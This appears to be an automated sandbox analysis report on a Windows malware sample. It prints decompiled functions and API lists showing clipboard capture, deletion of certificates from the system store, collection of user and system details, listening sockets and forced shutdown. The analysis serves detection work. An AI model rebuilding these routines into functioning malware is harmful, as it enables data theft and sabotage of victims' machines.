Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocFreeHeapVirtual$MemoryProcessReadWrite
String ID:
API String ID: 3557297850-0
Opcode ID: 5347e51a42341ed71737bbd49873ddf64a7f893120bf1da943359baf9a4657d8
Instruction ID: e5ac5cd9aafddfdb447b0c596dd665251eaa6f0ac9173e587eef7ed040220f59
Opcode Fuzzy Hash: 5347e51a42341ed71737bbd49873ddf64a7f893120bf1da943359baf9a4657d8
Instruction Fuzzy Hash: EE419B75608301AFD320CF64D984BA7B7B8FB98704F58446DF944AB290C778EC46CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004239D0, Relevance: 9.1, APIs: 6, Instructions: 67
synchronizationclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004239D0(int _a4) {
				void* __esi;
				void* _t9;
				void* _t14;
				void* _t17;
				int _t18;
				int _t19;
				int _t21;

				_t18 = _a4;
				_t17 = GetClipboardData(_t18);
				if(WaitForSingleObject( *0x42edbc, 0) != 0 && _t17 != 0 && (_t18 == 1 || _t18 == 0xd || _t18 == 7)) {
					_t21 = GlobalLock(_t17);
					if(_t21 != 0) {
						_t9 = _t18 - 1;
						if(_t9 == 0) {
							_t19 = E00410AA0(_t21, 0, 0xffffffff);
						} else {
							_t14 = _t9 - 6;
							if(_t14 == 0) {
								_t19 = E00410AA0(_t21, 1, 0xffffffff);
							} else {
								if(_t14 != 6) {
									_t19 = _a4;
								} else {
									_t19 = _t21;
								}
							}
						}
						if(_t19 != 0) {
							EnterCriticalSection(0x42ede8);
							E00423620(0x403980);
							E00423620(_t19);
							LeaveCriticalSection(0x42ede8);
							if(_t19 != _t21) {
								E004107C0(_t19);
							}
						}
						GlobalUnlock(_t17);
					}
				}
				return _t17;
			}

0x004239d2
0x004239dd
0x004239ef
0x00423a14
0x00423a18
0x00423a1c
0x00423a1d
0x00423a43
0x00423a1f
0x00423a1f
0x00423a22
0x00423a36
0x00423a24
0x00423a27
0x00423a47
0x00423a29
0x00423a29
0x00423a29
0x00423a27
0x00423a22
0x00423a4d
0x00423a54
0x00423a5f
0x00423a65
0x00423a6f
0x00423a77
0x00423a7b
0x00423a7b
0x00423a77
0x00423a81
0x00423a81
0x00423a87
0x00423a8c

APIs

GetClipboardData.USER32 ref: 004239D7
WaitForSingleObject.KERNEL32(?,00000000), ref: 004239E7
GlobalLock.KERNEL32 ref: 00423A0E
EnterCriticalSection.KERNEL32(0042EDE8,00000000,000000FF), ref: 00423A54
LeaveCriticalSection.KERNEL32(0042EDE8,00000000,00403980), ref: 00423A6F
GlobalUnlock.KERNEL32(00000000,00000000,000000FF), ref: 00423A81

Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,0040700E,0000FDE9,?), ref: 00410AE4
Part of subcall function 00410AA0: HeapAlloc.KERNEL32(?,00000008,-00000004,?,?,0040700E,0000FDE9,?), ref: 00410B05
Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000001,?,?,0040700E,0000FDE9,?), ref: 00410B34

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCriticalGlobalMultiSectionWide$AllocClipboardDataEnterHeapLeaveLockObjectSingleUnlockWait
String ID:
API String ID: 2993150087-0
Opcode ID: a902b307ccab85dacd2a1b39754aa9a8e654720a0f823630bb112d82cf33b6c5
Instruction ID: aaebd55efc4d60538a3f81200e497cdd45134bb810357bfef0854de8b8bfa8a7
Opcode Fuzzy Hash: a902b307ccab85dacd2a1b39754aa9a8e654720a0f823630bb112d82cf33b6c5
Instruction Fuzzy Hash: 9B11063630023167C2206F697C88B6F66399B95B63F99063FF196E73A0CE7CC941825D

Uniqueness

Uniqueness Score: -1.00%

Function 00412470, Relevance: 9.1, APIs: 6, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,00000000,74B5F780,74B5F780,?,?,?,00419076), ref: 00412486
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00419076), ref: 004124A7
CryptHashData.ADVAPI32 ref: 004124CB
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 004124E9
CryptDestroyHash.ADVAPI32(?), ref: 00412502
CryptReleaseContext.ADVAPI32(?,00000000,?,?,00419076), ref: 0041250F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: b6c52dc9bb1d02d3e78edf012d1bb749ba429b76eff0730747c79417dc97c8a0
Instruction ID: d80231df26b94d1ca82818cb005321da6368b4e31a4f5c3f439079dfdb15741f
Opcode Fuzzy Hash: b6c52dc9bb1d02d3e78edf012d1bb749ba429b76eff0730747c79417dc97c8a0
Instruction Fuzzy Hash: 88112175244300BFE710CF14DE85F6B77A9EB94B00F10C919F695E6290C7B4E888DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00423460, Relevance: 9.0, APIs: 6, Instructions: 41encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00403968), ref: 0042346B
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00423481
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 00423491
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,?,00000001,0041D83D), ref: 00423498
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004234A0
CertCloseStore.CRYPT32(00000000,00000000), ref: 004234AE

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Cert$Store$CertificateCertificatesEnum$CloseContextDeleteDuplicateFromOpenSystem
String ID:
API String ID: 3276010370-0
Opcode ID: 1d02b25a3371ad5244f583b37f0aaf48e3706127e1e3c4f5b52eb2f31b9618b7
Instruction ID: 1fff16008782fc0b791821716c0255c5cd1c9a879208098af8b06e725ccb713d
Opcode Fuzzy Hash: 1d02b25a3371ad5244f583b37f0aaf48e3706127e1e3c4f5b52eb2f31b9618b7
Instruction Fuzzy Hash: 28F0E93268132177C7222B696D48FABB77C9B45BA2F450062F984F33608E2CC84085BC

Uniqueness

Uniqueness Score: -1.00%

Function 0040C999, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 123
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040C999(intOrPtr* __eax, intOrPtr __ecx, void* __edx, long* __edi, signed int _a4, void* _a8, void* _a9, char _a11, signed int _a16, char _a28, char _a72, short _a80, signed int _a1092) {
				void* _t48;
				signed int _t54;
				signed int* _t55;
				signed int _t56;
				intOrPtr _t62;
				signed short _t66;
				signed char _t67;
				void* _t71;
				intOrPtr _t82;
				long _t87;
				signed int _t88;
				long* _t89;
				void* _t95;

				_t89 = __edi;
				 *__eax = 0x271a;
				 *((intOrPtr*)(__eax + 0xc)) = 4;
				 *((intOrPtr*)(__edx + 0x1c)) =  *((intOrPtr*)(__edx + 0x1c)) + 1;
				 *((intOrPtr*)(__edx + 0x14)) = __ecx;
				_t71 = 1;
				if((_a1092 & 0x00000008) == 0) {
					L13:
					if(_t71 == 0) {
						goto L2;
					} else {
						if((_a1092 & 0x00000010) == 0) {
							L22:
							if(_t71 == 0) {
								goto L2;
							} else {
								_t114 = _a1092 & 0x00000020;
								if((_a1092 & 0x00000020) == 0) {
									goto L6;
								} else {
									E0040C650(_t114, _t89, 2);
									E0040C650(_t114, _t89, 0x17);
									return _t71;
								}
							}
						} else {
							_t54 = GetModuleFileNameW(0,  &_a80, 0x103);
							_a16 = _t54;
							if(_t54 != 0) {
								 *((short*)(_t95 + 0x54 + _t54 * 2)) = 0;
								_t71 = E004189F0( &_a80, 0, _t89, 0x271e);
							}
							_a16 = 0x104;
							if(_t71 == 0) {
								goto L2;
							} else {
								_t55 =  &_a16;
								__imp__GetUserNameExW(2,  &_a80, _t55);
								if(_t55 != 0) {
									_t56 = _a4;
									if(_t56 != 0) {
										ds = 0x271f;
										asm("daa");
										 *_t56 =  *_t56 + _t56;
										 *((short*)(_t95 + 0x54 + _t56 * 2)) = 0;
										_push(_t89);
										_t71 = E004189F0( &_a72, 0);
									}
								}
								goto L22;
							}
						}
					}
				} else {
					E004105D0( &_a28);
					_t62 =  *((intOrPtr*)( *__edi + 0x14));
					_t79 = _t62 + 0x16;
					if(_t62 + 0x16 <= _t62 || E00410740(_t79, __edi) == 0) {
						L1:
						_t71 = 0;
						__eflags = 0;
						L2:
						__eflags = _a11 - 1;
						if(_a11 == 1) {
							_t48 =  *_t89;
							__eflags = _t48;
							if(_t48 != 0) {
								HeapFree( *0x42e6d4, 0, _t48);
							}
							 *_t89 = 0;
						}
						L6:
						return _t71;
					} else {
						_t87 =  *__edi;
						 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x14)) + _t87 + 8)) = 6;
						_t66 = E00410820( *((intOrPtr*)(_t87 + 0x14)) + _t87 + 0x10,  &_a28, 6);
						_t82 =  *((intOrPtr*)(_t66 + 8)) +  *((intOrPtr*)(_t87 + 0x14)) + 0x10;
						if(_t82 > 0xa00000) {
							goto L1;
						} else {
							 *_t66 = 0x271c;
							 *((intOrPtr*)(_t66 + 4)) = 0x20000;
							 *((intOrPtr*)(_t66 + 0xc)) = 6;
							 *((intOrPtr*)(_t87 + 0x1c)) =  *((intOrPtr*)(_t87 + 0x1c)) + 1;
							 *((intOrPtr*)(_t87 + 0x14)) = _t82;
							__imp__GetUserDefaultUILanguage();
							_t88 = _t66 & 0x0000ffff;
							_push(2);
							_t67 = _t95 + 0x18;
							_t95 = _t95 + 1;
							_push(_t67 & 0x00000018);
							_push(0x20000);
							_push(0x271d);
							 *(_t95 + 0x24) = _t88;
							_t71 = E00418930(__edi);
							goto L13;
						}
					}
				}
			}

0x0040c999
0x0040c999
0x0040c99f
0x0040c9a6
0x0040c9a9
0x0040c9ac
0x0040c9ed
0x0040ca84
0x0040ca86
0x00000000
0x0040ca8c
0x0040ca94
0x0040cb0e
0x0040cb10
0x00000000
0x0040cb16
0x0040cb16
0x0040cb1e
0x00000000
0x0040cb24
0x0040cb27
0x0040cb2f
0x0040cb3e
0x0040cb3e
0x0040cb1e
0x0040ca96
0x0040caa2
0x0040caa8
0x0040caae
0x0040cab7
0x0040cac6
0x0040cac6
0x0040cac8
0x0040cad2
0x00000000
0x0040cad8
0x0040cad8
0x0040cae4
0x0040caec
0x0040caee
0x0040caf4
0x0040caf9
0x0040cafa
0x0040cafb
0x0040cafd
0x0040cb02
0x0040cb0c
0x0040cb0c
0x0040caf4
0x00000000
0x0040caec
0x0040cad2
0x0040ca94
0x0040c9f3
0x0040c9f7
0x0040c9fe
0x0040ca01
0x0040ca06
0x0040c9b0
0x0040c9b0
0x0040c9b0
0x0040c9b2
0x0040c9b2
0x0040c9b7
0x0040c9b9
0x0040c9bb
0x0040c9bd
0x0040c9c8
0x0040c9c8
0x0040c9ce
0x0040c9ce
0x0040c9d4
0x0040c9de
0x0040ca13
0x0040ca13
0x0040ca29
0x0040ca2c
0x0040ca37
0x0040ca41
0x00000000
0x0040ca47
0x0040ca47
0x0040ca4d
0x0040ca54
0x0040ca57
0x0040ca5a
0x0040ca5d
0x0040ca63
0x0040ca66
0x0040ca68
0x0040ca69
0x0040ca6c
0x0040ca6d
0x0040ca72
0x0040ca79
0x0040ca82
0x00000000
0x0040ca82
0x0040ca41
0x0040ca06

APIs

HeapFree.KERNEL32(?,00000000,00000000), ref: 0040C9C8

Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752

GetUserDefaultUILanguage.KERNEL32(?,?,00000006), ref: 0040CA5D
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 0040CAA2
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040CAE4

Part of subcall function 004105D0: GetVersionExW.KERNEL32 ref: 004105ED
Part of subcall function 004105D0: GetNativeSystemInfo.KERNEL32 ref: 004105FB

Strings

, xrefs: 0040CB16

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapNameUser$DefaultFileInfoLanguageModuleNativeSystemVersion
String ID:
API String ID: 1129319608-3916222277
Opcode ID: e33d483f263785f38efcf3e6fb6cb0e58ed10f0c6557ea01c5000bf641b83ff5
Instruction ID: 0d41d9e7b5bc1bb790579288fb5c6d4a24f7772a5c0e227b605144d67b22647a
Opcode Fuzzy Hash: e33d483f263785f38efcf3e6fb6cb0e58ed10f0c6557ea01c5000bf641b83ff5
Instruction Fuzzy Hash: 3941DFB06443419BD314DF14D985BA7B7E4AF80304F08452FF984AB3D2C778D889CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00415030, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00415076
bind.WS2_32(00000000,00000002,-0000001D), ref: 0041509C
listen.WS2_32(00000000,7FFFFFFF), ref: 004150AC
closesocket.WS2_32(00000000), ref: 004150B7

Strings

p0u, xrefs: 004150B7

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: bindclosesocketlistensocket
String ID: p0u
API String ID: 952684215-1742372003
Opcode ID: be21aba39a96f2f9b71014a125fd46b950c8a25fb74be776c65c1ad629f45bdd
Instruction ID: 99ac13865a48e29dacfe8f6e27a71a168fc956e69657dab41d105f68ae03966d
Opcode Fuzzy Hash: be21aba39a96f2f9b71014a125fd46b950c8a25fb74be776c65c1ad629f45bdd
Instruction Fuzzy Hash: 3F01F530501A2066D320EA389D45BEF35956FC5761F848729F8B1E72E1EB38898883DA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E230, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040E230(void* __edx) {
				signed int _v120;
				void* __edi;
				signed char _t12;
				void* _t14;
				unsigned int _t19;

				_t12 =  *0x42d424; // 0x0
				if((_t12 & 0x00000010) == 0) {
					if((_t12 & 0x00000008) != 0) {
						E004101F0();
						_t12 =  *0x42d424; // 0x0
					}
					if((_t12 & 0x00000003) == 0) {
						if((_t12 & 0x00000004) != 0) {
							return ExitWindowsEx(0x14, 0x80000000);
						}
						goto L9;
					} else {
						_t14 = E004129B0(L"SeShutdownPrivilege");
						_t19 =  *0x42d424; // 0x0
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t19 >> 0x00000001 & 0x00000001, 0x80000000);
						return _t14;
					}
				} else {
					_t12 = E0041A520( &_v120);
					if(_t12 == 0) {
						L9:
						return _t12;
					} else {
						_v120 = _v120 | 0x00000020;
						 *0x42e8f8 =  *0x42e8f8 | 0x00000010;
						E0041A5C0( &_v120);
						return ExitWindowsEx(0x14, 0x80000000);
					}
				}
			}

0x0040e230
0x0040e23b
0x0040e274
0x0040e276
0x0040e27b
0x0040e27b
0x0040e282
0x0040e2b4
0x00000000
0x0040e2bd
0x00000000
0x0040e284
0x0040e289
0x0040e28e
0x0040e2a7
0x0040e2b1
0x0040e2b1
0x0040e23d
0x0040e242
0x0040e249
0x0040e2c7
0x0040e2c7
0x0040e24b
0x0040e24b
0x0040e250
0x0040e25b
0x0040e271
0x0040e271
0x0040e249

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040E2A7

Part of subcall function 0041A520: CreateMutexW.KERNEL32(0042E930,00000000,0042E788,?), ref: 0041A569
Part of subcall function 0041A520: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041A578
Part of subcall function 0041A520: CloseHandle.KERNEL32(00000000), ref: 0041A58A

Part of subcall function 0041A5C0: ReleaseMutex.KERNEL32(?,?,00000000), ref: 0041A60D
Part of subcall function 0041A5C0: CloseHandle.KERNEL32(?), ref: 0041A614

ExitWindowsEx.USER32(00000014,80000000), ref: 0040E267

Strings

, xrefs: 0040E24B
SeShutdownPrivilege, xrefs: 0040E284

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleMutex$CreateExitInitiateObjectReleaseShutdownSingleSystemWaitWindows
String ID: $SeShutdownPrivilege
API String ID: 3115218271-2253681161
Opcode ID: 1da8a9f5749e858456e2145c5951a79674b2b815f7af96fca57dc92cb2172cd1
Instruction ID: e21cf1f491083f6032e94e80d8cf2aced7c6104cf6be9939c8967ab8324e9996
Opcode Fuzzy Hash: 1da8a9f5749e858456e2145c5951a79674b2b815f7af96fca57dc92cb2172cd1
Instruction Fuzzy Hash: B001F735700200A5EA2477599D0BFD93758DB40B09FE4087EFAC5361F2C6B82416926D

Uniqueness

Uniqueness Score: -1.00%

Function 00414EE0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(0000007E,00000001,00000006), ref: 00414EE9
bind.WS2_32(00000000,?,-0000001D), ref: 00414F09
listen.WS2_32(00000000,?), ref: 00414F19
closesocket.WS2_32(00000000), ref: 00414F24

Strings

p0u, xrefs: 00414F24

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: bindclosesocketlistensocket
String ID: p0u
API String ID: 952684215-1742372003
Opcode ID: 6d3e67332895148afcb5e8b08cb1ed534dab948c37b46b11654884dfeb8836ff
Instruction ID: 24ac27e043fd9b8ecda0badeb71ceb333669ae391d62fde6e33f795113d85586
Opcode Fuzzy Hash: 6d3e67332895148afcb5e8b08cb1ed534dab948c37b46b11654884dfeb8836ff
Instruction Fuzzy Hash: D3F0277120452077D2145B38AE09EEF3668EFD17B0B00432AF523E62E0F7788C82C2E8

Uniqueness

Uniqueness Score: -1.00%

Function 00415320, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 00415329
bind.WS2_32(00000000,00000017,-0000001D), ref: 00415349
closesocket.WS2_32(00000000), ref: 00415354

Strings

p0u, xrefs: 00415354

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: bindclosesocketsocket
String ID: p0u
API String ID: 1873677229-1742372003
Opcode ID: cde26db7407258dbc4cdb5e2141c4221c56a916a6199631f3eb37feaeba1ce55
Instruction ID: 467bb6e162b5c60878463fe77fa36cd9493afaeeb4dc03b5692ef376c5f73ffe
Opcode Fuzzy Hash: cde26db7407258dbc4cdb5e2141c4221c56a916a6199631f3eb37feaeba1ce55
Instruction Fuzzy Hash: EEE0923110092067D6182738AC0EAEF2654AB817B07080319F933E61E1F7A88C8181A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3FD, Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 430COMMON

Download Yara Rule

Strings

u5VPhXB, xrefs: 0040F852

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: u5VPhXB
API String ID: 0-1119068662
Opcode ID: d5d4940b2570c89eb081d0652c14ae96634e4fbd613d05b34bb7dc293484ac81
Instruction ID: d311ddb97ebac8ab0098921e18af0608a1b5a211382f9f48b192f0ff14e5409a
Opcode Fuzzy Hash: d5d4940b2570c89eb081d0652c14ae96634e4fbd613d05b34bb7dc293484ac81
Instruction Fuzzy Hash: 2DE1EF31504381AFD735EF34D886AA6BBB1FF56310B9844BFC480AB992E735548BCB46

Uniqueness

Uniqueness Score: -1.00%

Function 00412930, Relevance: 6.0, APIs: 4, Instructions: 45
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412930(intOrPtr _a4) {
				intOrPtr _v24;
				void* _v32;
				void* _v36;
				signed int _t6;
				void* _t18;
				void* _t20;
				intOrPtr _t21;

				_t21 = _a4;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t20 = _t6;
				if(_t20 == 0xffffffff) {
					return _t6 | 0xffffffff;
				} else {
					_t18 = 0;
					_v32 = 0x1c;
					if(Thread32First(_t20,  &_v32) != 0) {
						do {
							if(_v24 == _t21) {
								_t18 = _t18 + 1;
							}
						} while (Thread32Next(_t20,  &_v36) != 0);
					}
					CloseHandle(_t20);
					return _t18;
				}
			}

0x00412934
0x0041293d
0x00412943
0x00412948
0x0041299e
0x0041294a
0x00412951
0x00412953
0x00412963
0x00412970
0x00412974
0x00412976
0x00412976
0x0041297f
0x00412983
0x00412985
0x00412993
0x00412993

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0041293D
Thread32First.KERNEL32 ref: 0041295B
Thread32Next.KERNEL32 ref: 0041297D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00412985

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: fdd97d772bf086a796bf9c1edaf51b29d20c289794e196395a8406a2a9304c96
Instruction ID: ab7839618c050b0d7b9a10ac662ef457f472db0ce98ecdc34f47adabf94b15dd
Opcode Fuzzy Hash: fdd97d772bf086a796bf9c1edaf51b29d20c289794e196395a8406a2a9304c96
Instruction Fuzzy Hash: D0F0F9B62002155BD210AF1D9D44BEBB3D8EF94320F04022AFA69D21A0D3309E58CABA

Uniqueness

Uniqueness Score: -1.00%

Function 00420440, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00420440() {
				char _v696;
				char _v832;
				char _v900;
				char _v928;
				long _v1092;
				char _v1096;
				char _v1104;
				intOrPtr* _v1112;
				void* _v1120;
				char _v1128;
				char _v1136;
				char _v1144;
				intOrPtr* _v1148;
				char _v1152;
				intOrPtr* _v1156;
				void* _v1160;
				intOrPtr* _v1164;
				char _v1173;
				char _v1192;
				signed char _v1197;
				void* __ebx;
				void* __esi;
				long* _t50;
				intOrPtr* _t64;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				void* _t74;
				intOrPtr* _t76;
				intOrPtr* _t79;
				signed char _t81;
				void* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				void* _t87;
				signed short _t89;
				signed int _t94;
				void* _t95;
				short* _t115;
				intOrPtr* _t132;
				char* _t134;
				char* _t137;
				void* _t138;

				_t138 =  &_v1112;
				_t50 =  &_v1092;
				_v1092 = 0;
				__imp__CoCreateInstance(0x4015e0, 0, 0x4401, 0x4015c0, _t50);
				if(_t50 != 0) {
					L30:
					return _t50;
				}
				_t132 = _v1112;
				if(_t132 == 0) {
					goto L30;
				}
				_t5 = _t50 + 0x39; // 0x39
				E00424100(_t5,  &_v1096);
				_t134 =  &_v1104;
				E00424100(0x3a, _t134);
				_push(_t134);
				_push( &_v1096);
				_t95 = 0;
				_push(_t132);
				_v1120 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0xc))))() != 0) {
					L26:
					_t50 =  *((intOrPtr*)( *((intOrPtr*)( *_t132 + 8))))(_t132);
					if(_t95 == 0) {
						goto L30;
					}
					if( *_t95 != 0) {
						E00424100(0x38,  &_v696);
						E0040D880(_t95, 0xcc,  &_v696);
					}
					return HeapFree( *0x42e6d4, 0, _t95);
				}
				_push( &_v1136);
				_push(_t132);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x20))))() != 0) {
					goto L26;
				}
				_t13 = _t95 + 0x3b; // 0x3b
				E00424100(_t13,  &_v900);
				_t64 = _v1144;
				 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 0xc))))(_t64);
				_t67 = _v1148;
				_push(_t67);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x10))))() != 0) {
					L25:
					_t69 = _v1152;
					 *((intOrPtr*)( *((intOrPtr*)( *_t69 + 8))))(_t69);
					goto L26;
				}
				do {
					_t71 = _v1152;
					_push( &_v1144);
					_push(_t71);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t71 + 0x14))))() != 0) {
						goto L23;
					}
					_t76 = _v1152;
					_push( &_v1144);
					_push(0x4015d0);
					_push(_t76);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t76))))() != 0) {
						L22:
						_t79 = _v1164;
						 *((intOrPtr*)( *((intOrPtr*)( *_t79 + 8))))(_t79);
						goto L23;
					}
					_t81 = 1;
					_v1173 = 1;
					while(1) {
						_push(_t81 & 0x000000ff);
						_t137 =  &_v832;
						_t82 = E00411D10(_t81, 0x34, _t137,  &_v928);
						_t138 = _t138 + 8;
						if(_t82 <= 0) {
							break;
						}
						_t85 = _v1156;
						_v1152 = 0x64;
						_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0xc))))(_t85, _t137, 0,  &_v1128, 0x64,  &_v1152);
						if(_t87 != 0) {
							if(_t87 == 0x7a || _t87 == 1) {
								L20:
								_t81 = _v1197 + 1;
								_v1197 = _t81;
								if(_t81 <= 0x64) {
									continue;
								}
							}
							break;
						}
						_t89 = _v1152;
						_t115 =  &_v1152;
						if(_t89 == 0) {
							L15:
							if( *_t115 != 0x40) {
								goto L20;
							}
							L16:
							if(E00410D70( &_v1192,  &_v1152, 0xffffffff) != 0) {
								E00410D70( &_v1192, 0x403964, 1);
							}
							goto L20;
						}
						_t94 = _t89 & 0x0000ffff;
						while(_t94 != 0x40) {
							_t94 =  *(_t115 + 2) & 0x0000ffff;
							_t115 = _t115 + 2;
							if(_t94 != 0) {
								continue;
							}
							goto L15;
						}
						goto L16;
					}
					_t83 = _v1156;
					 *((intOrPtr*)( *((intOrPtr*)( *_t83 + 8))))(_t83);
					goto L22;
					L23:
					_t74 = _v1160;
					_push(_t74);
				} while ( *((intOrPtr*)( *((intOrPtr*)( *_t74 + 0x10))))() == 0);
				_t95 = _v1160;
				goto L25;
			}

0x00420440
0x00420449
0x0042045f
0x00420467
0x0042046f
0x00420681
0x00420681
0x00420681
0x00420475
0x0042047b
0x00000000
0x00000000
0x00420485
0x00420488
0x0042048d
0x00420496
0x004204a2
0x004204a7
0x004204a8
0x004204aa
0x004204ab
0x004204b3
0x00420637
0x0042063d
0x00420641
0x00000000
0x00000000
0x00420647
0x00420655
0x00420664
0x00420664
0x00000000
0x00420672
0x004204c2
0x004204c3
0x004204c8
0x00000000
0x00000000
0x004204d5
0x004204d8
0x004204dd
0x004204e7
0x004204e9
0x004204f2
0x004204f7
0x0042062b
0x0042062b
0x00420635
0x00000000
0x00420635
0x00420500
0x00420500
0x0042050a
0x0042050b
0x00420513
0x00000000
0x00000000
0x00420519
0x00420523
0x00420524
0x00420529
0x00420530
0x00420607
0x00420607
